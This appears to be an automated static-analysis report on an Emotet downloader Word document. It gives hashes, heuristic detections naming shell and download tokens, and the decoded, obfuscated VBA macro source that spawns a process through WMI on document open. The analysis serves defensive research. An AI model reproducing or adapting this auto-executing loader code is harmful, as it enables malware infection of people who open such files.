Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4b69f6b3d9d08675…

MALICIOUS

Office (OLE)

93.6 KB Created: 2019-12-18 22:09:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: f0bd6294fab36c74e9134307d4b454b3 SHA-1: d7de6049702f802e73e39ef3306b08e21e03c352 SHA-256: 4b69f6b3d9d0867579eb36dc0a44f084d94dc5653e9cbcdefcccea7ac7b84fcc
232 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7464930-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7464930-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Scryvwusn = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Rnuekdgnz.Aklhsdytvadu + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Klymuqeo = VBA.CreateObject(JJKBSKJ + Scryvwusn)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11000 bytes
SHA-256: 85646354822f474207c7388c28da3b9b8065405706f8cea7b437443a622dca8a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
294 of 513 identifiers look randomly generated (e.g. 'Sctlzdxzxdrqf') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Rnuekdgnz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Aklhsdytvadu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Fnwyraaizzj = Ogjykxkgdc
Yirgutaiekt = 820
Ileuznrbp = ("Laurie")
Lhnryicl = (672)
Dim Trjbegijg As Integer
Dim Rpcmgmeotoi As Integer
Dim Vmfjkwiigzo As Integer
Dim Suhisjqqtsle As String
Dim Xwsuldvgrazyk As Double
Dim Kqntktkhk As Boolean
Dim Xxbutesaklofd As Integer
Mchjtyul = (575)
Dim Ylhcnphx As Double
Xexgugjlt = ("Eos voluptate eos ab.")
Jekgizbcad = (603)
Dim Tvtkxxvghrjc As Double
Aompjrmro = Wepgulckmdkbv
Xpcsuhydzmq = Ufbhmobsganf
Vbqnrdvuxovm = "Enim commodi sit eveniet."
Bqtebhqgcdphk = 509
   Kqlqkuic = Aarzkjfwlsrg
Yzpnguntveyx = 568
Sctlzdxzxdrqf = ("Magni facere officia.")
Ukehuslfuvtig = (229)
Dim Bmhheiyfgf As Integer
Dim Blwqpswbutqie As Integer
Dim Yqgvqukcejyqo As Double
Dim Ybatjtxfe As Integer
Dim Dshvycxlap As Boolean
Dim Ddqjsgrbif As Integer
Dim Pikxdakcegrsu As Integer
Vtcupyqwqs = (457)
Dim Znpaxdlgp As Double
Izexfxmypjuvh = ("Josefina")
Zxymueuulo = (463)
Dim Tpjbvdutv As Boolean
Lzeuuwer = Ndnidxvoesjq
Jfhzrnnpoxnm = Zyhxhlglvt
Yfqrruill = "Nostrum maxime."
Fzuhxoqvrgk = 328
   Ftuoycmovq = Xnyirdfi
Kxjxzxkg = 755
Wqumxsmxeav = ("Omnis quos voluptas.")
Bhyicmebwdf = (701)
Dim Eacpepjcdgsll As Boolean
Dim Hdifajiqboh As Double
Dim Nanpdanl As Integer
Dim Vgamxagwqnn As String
Dim Uzinwkbawuhp As String
Dim Dikkfmomzzwk As Boolean
Dim Sqhothspunrb As Integer
Ylswthcngch = (144)
Dim Iajqmugi As String
Swwanoxtesa = ("Magnam est.")
Gaqisekegld = (107)
Dim Lxfgngsyaax As Double
Zijdodumcpv = Dvilksqyczn
Uvpgzsbde = Dxapcjhjuycxq
Eqqwjvgjizx = "Animi saepe."
Cjlytmimsav = 254
Odmoouhgcoht
End Sub

Attribute VB_Name = "Afvutucle"
Attribute VB_Base = "0{6D21C294-5A0A-46C4-9146-94AE55B0D5C4}{ECBC2FEA-BBAE-4612-B6FE-B738BF045118}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Ixcmyxdxrtr"
Function Wzwxawzlswk()
   Dnasihwb = Fgfpxyxtmweo
Kgqeccvwwx = 687
Rjjjpfjvbvqq = ("Phil")
Oowkxpxphcqs = (890)
Dim Wjjhaghokdhye As String
Dim Opawhohzmz As Double
Dim Cbgswgkzsmip As Integer
Dim Zdtczkcftnq As String
Dim Kojxiblfmek As Integer
Dim Tvschkvupdfk As Integer
Dim Rwitcbpakio As String
Pimzjrhrgmq = (400)
Dim Awukdnimu As Integer
Lhjbskjng = ("Aliquam cumque modi.")
Mcdwssxkj = (948)
Dim Wasfzebrcv As Double
Obhfywdcz = Kshhuqojymyl
Mlfmptkmup = Myogpnmgin
Gbombvqqywmlx = "Debitis quod ut magnam."
Rjxxsmjdpu = 92
Xbvbgxrxhz = Rnuekdgnz.Aklhsdytvadu
   Bjvaaazo = Ebrbgfeiy
Fvdfpizttorkx = 780
Kgczsxalu = ("Vero ipsa atque id.")
Nadhssfd = (18)
Dim Sukszuwtmqt As Boolean
Dim Uxfyjzfk As String
Dim Nvzpmvyftkrsl As Boolean
Dim Scdrhtisz As String
Dim Muvdqeiyxx As Integer
Dim Kxolakicm As String
Dim Qxbsbdedahc As Integer
Jptnjnvks = (403)
Dim Tthihqgxycfg As Boolean
Hvsuzxiojb = ("Sed.")
Uszshxaizhv = (905)
Dim Kaekbejeccrd As Integer
Zkekgyqvnygv = Glzavypxd
Xalsqhpre = Uxoyeomgegwdy
Rhrechbc = "Sapiente quas necessitatibus ullam velit iure dolorem."
Fdxqqedeiqclx = 969
Ipiwqzcqevo = Xbvbgxrxhz + Afvutucle.Gkecxtky + Afvutucle.Tkmteuts + Afvutucle.Uizvcuedhy
   Pwbqcbdu = Pkaiykfojxne
Gbreyzwllbfk = 885
Quvnkmzu = ("Voluptas aut sed nesciunt.")
Uowdppoki = (33)
Dim Akzvaxdzyc As Integer
Dim Eyobaubu As Integer
Dim Kjkctwvnv As String
Dim Rpkwrjpwuydgk As Boolean
Dim Bnoqhmxwz As String
Dim Xdhdlhmfni As Integer
Dim Iklysggdz As Boolean
Uiyftmutkgf = (676)
Dim Oqmwtfewxh As Integer
Wofpsmlmo = ("Reprehenderit explicabo.")
Nctttotydyyj = (673)
Dim Kkuhswatzxxp As Double
Utzycuzualkh = Cgxfdvibqf
Vtcvvekbejz = Guqkiwlsr
Zsliksctcmzf = "Perspiciatis."
Qgwdeshxx = 313
Bqwkbpkzip = Ipiwqzcqevo + Afvutucle.Sjrnukxepun + Afvutucle.Rwzjuoionfy.Factoid
   Midsxvzperwg = Jqfiynjahuwgy
Kqbfxqpppgz = 953
Gcizenhgztvp = ("Voluptatem voluptates explicabo.")
Aivrxxauau = (262)
Dim Itapczoot As Double
Dim Wbluilxgpo As Integer
Dim Guocaumcnxx As Integer
Dim Fkrwbutvwyq As Integer
Dim Ridomtef As Boolean
Dim Nwnugcyzdhgc As Integer
Dim Jotkskvyr As String
Dyylezim = (155)
Dim Znzntyzm As Double
Ohxeyzumjapfq = ("Amet assumenda corrupti necessitatibus dolores deleniti doloremque magnam tempora.")
Dznzhxqm = (779)
Dim Atwzmvlman As Integer
Tnffwcoo = Hkpymnxzyvuux
Mxedsqegbgzub = Xoqdlmjniyp
Zgzqzijekka = "Terry"
Dnrmsvxk = 745
Wzwxawzlswk = Fmenbjha + Bqwkbpkzip + Fmenbjha
   Smdkthrx = Wgxvvyhofof
Xzojgunmfwu = 649
Ecgsrofqyeq = ("Non facilis dicta quisquam.")
Mglsdxmw = (36)
Dim Fxldqcrkcc As Boolean
Dim Einxrazzuxqf As Integer
Dim Bmtwfsyra As Integer
Dim Loohunqus As Integer
Dim Fggmxgqh As String
Dim Vjbfqfwnw As String
Dim Tqfllrajz As Double
Fyhnqtvrbtm = (620)
Dim Fmbdhugwovm As Integer
Amoqxitg = ("Quibusdam laudantium harum.")
Xdpdsemn = (132)
Dim Pgyqwbfetqc As Boolean
Ptidkvehiajda = Orchfzltoyt
Onnadfaj = Brcihfom
Oqboupydzu = "Jordan"
Absumjaurhe = 652
End Function
Function Odmoouhgcoht()
   Wgigiqzqxuh = Beloxxtqz
Gnpvdhwvmmp = 125
Spivnsjekyev = ("Qui et qui sunt qui enim.")
Anfzxlraubdnq = (843)
Dim Xtmjsvioxd As Integer
Dim Lvplzqhwhg As Boolean
Dim Ibsuhszcltne As Boolean
Dim Ueryiwqzfe As Double
Dim Exjbeqguarc As Double
Dim Edeasiksn As Double
Dim Ejyqbjvo As Integer
Nbtjpwyxkcb = (622)
Dim Dsmymwuxqbf As Integer
Sptrvoxqrbkr = ("Qui.")
Lvdtbasuyo = (56)
Dim Rvtxanmud As String
Thngamqbh = Ibniewcyqe
Wbwtbxfjicq = Ourihndzin
Siprfsamtq = "Ea ea itaque exercitationem repudiandae quisquam autem quos aut."
Tpdbzafl = 438
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Scryvwusn = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Rnuekdgnz.Aklhsdytvadu + "rocess"
   Mmbtadhosa = Ujbivtkuivmq
Jkwfonuxulzsv = 121
Ahhjvarmv = ("Quis ratione cum aliquam sit quaerat veniam aliquid.")
Ezbqzlddtxrnm = (23)
Dim Xpqicympiofgt As Integer
Dim Xaooiuvdloor As Double
Dim Ituqydcvm As String
Dim Rkscueji As Integer
Dim Ryyjdble As Double
Dim Hiizulpvsqb As Integer
Dim Mrkdbrje As Double
Grvvhvcq = (625)
Dim Zuibtijpopky As Boolean
Lssyknljxfchy = ("Amet ipsa et nihil ut.")
Zqakvbsii = (354)
Dim Huptsioxjpcd As Integer
Gqwczljt = Zknhwtjjosf
Enttbftxmuho = Gjyionbtivgb
Sonxpwspf = "Ramiro"
Onrnpgsky = 687
Set Klymuqeo = VBA.CreateObject(JJKBSKJ + Scryvwusn)
   Zxrjsuuw = Pvngwezxeacp
Grembiahqre = 889
Cqfnaurkgq = ("Consequuntur.")
Pfyxryjyadb = (135)
Dim Vhtiewbmrw As Double
Dim Mcvhgzavylccj As Double
Dim Vmlzppeemxbb As String
Dim Bxiryfwoq As Double
Dim Atkkfryf As Boolean
Dim Zgxrjhxij As Double
Dim Goxntlkuvgvrv As Integer
Uthgdwqabrlao = (353)
Dim Fgqftfmwlfnli As Integer
Obbnmeac = ("Nemo.")
Qovwilvw = (128)
Dim Paqvqhxv As Double
Kiaxcjyblue = Ddqqadurolz
Lfxegfclqhn = Znulcvllmszr
Gxwwbioxsdgn = "Quis inventore sit hic quo."
Dnvdshdh = 152
Sheihghumywl = Scryvwusn + Afvutucle.Phkifueuuw.ControlTipText + Afvutucle.Kwnqamuppcgx.ControlTipText
   Utsrjsymed = Iaqmfqkywvm
Ratfxsjlktiev = 848
Fdfidtusqzxgb = ("Sed est.")
Yhjsssfhhly = (114)
Dim Hhhknlttqeffw As Boolean
Dim Gzlhyvva As Integer
Dim Jhavywfp As Boolean
Dim Irnsqtwicd As Integer
Dim Kcbhzqfclgmhd As String
Dim Xrizqawtomsr As Integer
Dim Nyrqnwxurwpjt As Integer
Fgomzzqu = (831)
Dim Vojnvhzbeyiu As Double
Hwcalkhgwri = ("Ut quia.")
Fezwdovs = (418)
Dim Hvpqhpbtlqz As String
Wqjtoorr = Dtwfbfguxzi
Vuzruywoe = Cguuhdqw
Mwkjzofvb = "Facere qui."
Alnyowwthayt = 436
Esydxetckuhsv = Sheihghumywl + Rnuekdgnz.Aklhsdytvadu
   Fdzemvjzjsifz = Cswaathrat
Vqtwcrbwnhsy = 809
Wlpvpsfiqmb = ("Omnis enim iste et iste.")
Eylzkkbn = (706)
Dim Wfoyqwvzxbm As Double
Dim Bfdjomzhvknxx As Boolean
Dim Hoxamvtqb As Double
Dim Lumdrrhcjug As Double
Dim Akhbuabsun As Boolean
Dim Dlkaiocoaa As Boolean
Dim Rtwpvsoanlzc As Double
Vbtvrhutnfwc = (409)
Dim Emmafmjbd As String
Czqwrlhlqtbve = ("Accusantium officiis qui possimus.")
Ayfqttqiwazzx = (4)
Dim Uxhypidxw As Integer
Qlldqhqillv = Dlquvslkjhyd
Uoxajwecf = Krjprxykpvds
Diehdmzc = "Est provident aut molestias sint."
Tokmqoaftblbc = 731
Set Odmoouhgcoht = CreateObject(Esydxetckuhsv)
   Zuzigbnzsb = Zxtmwbojbmwh
Axiixnqfhp = 763
Wvsykzdw = ("Earnest")
Bdbkbgjnysbu = (557)
Dim Rjepeuqeose As Boolean
Dim Cbwekzjvehm As Boolean
Dim Vurfcbucha As String
Dim Srbxpjgipgl As Integer
Dim Rvrvmcseuyw As String
Dim Qdzouabrr As Double
Dim Xpygduoip As Integer
Fchuydiyte = (380)
Dim Tcjbmkzwz As Boolean
Xxelazjnxq = ("Voluptatem.")
Whacyitodmifd = (803)
Dim Cxqvlssjxtri As String
Rnqoemumib = Zglpziggg
Vtfdydihz = Lysrziyqp
Gsmxiujcr = "Voluptatem aut."
Guuziviz = 797
Odmoouhgcoht.XSize = False
   Gqlargef = Jpxqfekyxlfc
Wvpwogxua = 281
Zxagnpirmhzq = ("Velit sapiente exercitationem.")
Ptbefyez = (788)
Dim Vqhqjtpom As Double
Dim Gjrjvwleb As String
Dim Xuynwqvmp As Integer
Dim Wkxirhsrkeuw As String
Dim Jukbsvchqs As Double
Dim Wxytzihlmgmm As String
Dim Ljladyoc As Boolean
Lkwdsoueuzkv = (671)
Dim Empxydixxpks As String
Podukdhpldt = ("Leland")
Hrfspqtvrj = (35)
Dim Jnongszs As Integer
Gvqlpkoalea = Frwvccux
Qaqtcekufj = Kcdbjgqxmd
Ivkxxpirai = "In fuga."
Yqmvbjuhit = 723
Odmoouhgcoht.YSize = False
   Thpffxgixhx = Ygkkkvjo
Mkarpmclq = 561
Sdhwpcojh = ("Amet necessitatibus voluptatibus assumenda eius eum est nesciunt totam.")
Wfrmjedm = (964)
Dim Wzdvefrwvvhlu As Double
Dim Cnutuepj As Integer
Dim Vacdxiehgwe As Integer
Dim Kwwmldvk As Integer
Dim Jgritjuhqu As Boolean
Dim Fptxmdeojy As Boolean
Dim Kwxsdfndko As Boolean
Gzkxlonjuarhs = (950)
Dim Sfwblifywlc As Integer
Gdzqxwqmsg = ("Ex et est labore quia quasi repellendus et.")
Korjfqzoovyn = (442)
Dim Obbnmjkcc As Integer
Akvydzzu = Tnorucpw
Mdqiolfut = Laiegdqkw
Gguonvrgvgrm = "Ducimus totam omnis."
Unjsueawthngn = 580
Do While Klymuqeo.Create(UJNDB & Wzwxawzlswk, Watbnmftlfyf, Odmoouhgcoht, Ednkgktl)
Loop
   Gbpywqsedvzbt = Yfbpvtnn
Dkchnmvtpz = 440
Swwswjbayyyy = ("Jackie")
Ecketnpptgp = (313)
Dim Idhddzfmetc As Double
Dim Mzkfmdaa As Boolean
Dim Ilfmdcdpdaus As Double
Dim Vvzcbzjhhqb As Double
Dim Oulwpajyr As Integer
Dim Ckbdzwitct As String
Dim Exzikbeolmw As String
Sdfrnsdxmaqyf = (431)
Dim Hhomecgyqs As String
Njbpnlhhtdcoa = ("Omnis et saepe.")
Sxikesugdykl = (298)
Dim Eoznuqokkd As Integer
Bqefzlxjnbhiu = Cyrdaovoocag
Imfxfrdcx = Njxdgrtpxmmtz
Gbpcyfhdfo = "Quo dolores."
Pnpzatemex = 632
End Function